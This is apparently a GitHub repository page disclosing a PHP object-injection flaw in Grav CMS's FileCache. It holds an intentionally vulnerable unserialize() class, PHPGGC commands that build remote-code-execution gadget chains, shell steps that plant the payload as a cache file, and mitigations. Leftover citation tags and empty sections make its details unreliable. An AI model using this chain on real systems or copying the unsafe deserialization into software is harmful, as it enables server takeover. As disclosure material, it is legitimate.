Skip to content

devsamuelsantiago/grav-cms-filecache-object-injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
exploit.sh
exploit.sh
 
 
payload_generator.php
payload_generator.php
 
 
vulnerable.php
vulnerable.php
 
 

Repository files navigation

Grav CMS FileCache Object Injection

Description

The FileCache::doGet() method deserializes cache values using unserialize(..., ['allowed_classes' => true]), allowing arbitrary object instantiation when cache files are controlled by an attacker.[web:12]

Impact

  • Arbitrary object injection
  • Remote code execution via PHP gadget chains
  • Access to sensitive properties/magic methods
  • Privilege escalation in PHP applications

Affected Versions

Attack Scenario

  1. Cache directory has incorrect permissions (/tmp/cache/)
  2. Attacker writes a malicious cache file
  3. Application calls FileCache::get() → triggers unserialize
  4. Malicious object executes the payload

PoC Demonstration

1. Vulnerable Setup

<?php
// vulnerable.php
class VulnerableFileCache {
    private $cacheDir = './cache/';
    
    public function doGet($key) {
        $file = $this->cacheDir . md5($key) . '.cache';
        if (file_exists($file)) {
            $data = file_get_contents($file);
            return unserialize($data, ['allowed_classes' => true]); // VULNERABLE
        }
        return null;
    }
}

$cache = new VulnerableFileCache();
$result = $cache->doGet('test');
var_dump($result);
?>

2. Payload Generator (PHPGGC)

# Install PHPGGC
git clone https://github.com/ambionics/phpggc
cd phpggc
./phpggc monolog/rce1 system "whoami" > payload.ser

3. Deploy Payload

mkdir -p cache/
echo -n "$(cat payload.ser)" > cache/$(echo -n 'test' | md5sum | cut -d' ' -f1).cache
chmod 666 cache/*.cache  # Insecure permissions

4. Trigger Exploit

php vulnerable.php
# Output: currentuser

Recommended Gadget Chains [web:9][web:18]

Framework Command Type
Monolog/RCE1 ./phpggc monolog/rce1 system id RCE
Laravel/RCE1 ./phpggc laravel/rce1 system id RCE
Symfony/RCE1 ./phpggc symfony/rce1 system id RCE
Guzzle/RCE1 ./phpggc guzzle/rce1 system id RCE

Mitigations

  • Use JSON/primitive types instead of objects
  • Integrity (HMAC) on cache files
  • Set cache directory permissions to 0700
  • Strict allowlist: ['allowed_classes' => ['SafeClass1', 'SafeClass2']]
  • Validate the origin of cache files

References

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages